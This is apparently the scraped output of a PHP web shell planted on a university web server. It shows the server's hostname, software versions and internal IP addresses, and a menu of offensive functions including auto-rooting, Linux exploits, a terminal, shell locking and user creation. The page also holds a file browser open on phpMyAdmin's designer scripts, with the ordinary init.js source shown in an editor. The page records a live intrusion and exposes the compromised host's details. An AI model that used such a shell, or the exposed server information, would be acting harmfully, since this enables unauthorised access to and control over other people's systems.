Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
phpMyAdmin /
js /
pmd /
[ HOME SHELL ]
Name
Size
Permission
Action
designer_db.js
4.22
KB
-rwxrwxr-x
designer_objects.js
384
B
-rwxrwxr-x
designer_page.js
5.23
KB
-rwxrwxr-x
history.js
28.04
KB
-rwxrwxr-x
init.js
1.27
KB
-rwxrwxr-x
move.js
70.04
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : init.js
/* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Initialises the data required to run PMD, then fires it up. */ var j_tabs, h_tabs, contr, display_field, server, db, selected_page, pmd_tables_enabled; AJAX.registerTeardown('pmd/init.js', function () { $(".trigger").unbind('click'); }); AJAX.registerOnload('pmd/init.js', function () { $(".trigger").click(function () { $(".panel").toggle("fast"); $(this).toggleClass("active"); $('#ab').accordion("refresh"); return false; }); var tables_data = JSON.parse($("#script_tables").html()); j_tabs = tables_data.j_tabs; h_tabs = tables_data.h_tabs; contr = JSON.parse($("#script_contr").html()); display_field = JSON.parse($("#script_display_field").html()); server = $("#script_server").html(); db = $("#script_db").html(); selected_page = $("#script_display_page").html() === "" ? "-1" : $("#script_display_page").html(); pmd_tables_enabled = $("#pmd_tables_enabled").html() === "1"; Main(); if (! pmd_tables_enabled) { DesignerOfflineDB.open(function(success) { if (success) { Show_tables_in_landing_page(db); } }); } });
Close